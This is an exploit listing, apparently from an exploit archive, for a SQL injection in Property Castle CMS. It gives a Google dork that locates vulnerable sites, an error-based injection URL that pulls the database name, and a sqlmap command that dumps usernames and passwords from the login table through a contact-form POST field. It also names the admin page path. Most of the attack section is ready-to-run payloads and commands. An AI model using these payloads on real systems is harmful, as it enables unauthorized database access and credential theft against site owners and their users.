Property Castle CMS post SQL injection

2015.10.06

Credit: Timoumi Houcem

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: inurl:"/cms/cms.php?link_id="

# Exploit Title: Property Castle CMS post SQL injection
# Google Dork: inurl:"/cms/cms.php?link_id="
# Date: 05/10/2015
# Exploit Author: Timoumi Houcem
# Tested on: kali linux on iceweasel browser
# EXPLOIT
1-get database name : http://URL/file.php?link_id=4%27+and+updatexml(null,/*!50000concat*/(0x3a3a,database()),null)--+
we will have database name
2- we search "contact us" page
3- we use "http header" to get data names (all post data are injectable , i will use the first in this example)
4- we use sqlmap tool now and inject it with POST method
EXAMPLE : [ sqlmap --url "http://website/user/controller/valuation/valuation-controller.php" --data "name=aaa&contact_no=200131154&email_id=aaaa%40aa.com&postcode=1561&return_page=%2Fproperties%2Fcms%2Fcms.php" -p name -D [database_name] -T login -C username,password --dump ]
#admin page: http://website/admin/index.php

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Property Castle CMS post SQL injection

Dork: inurl:"/cms/cms.php?link_id="

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.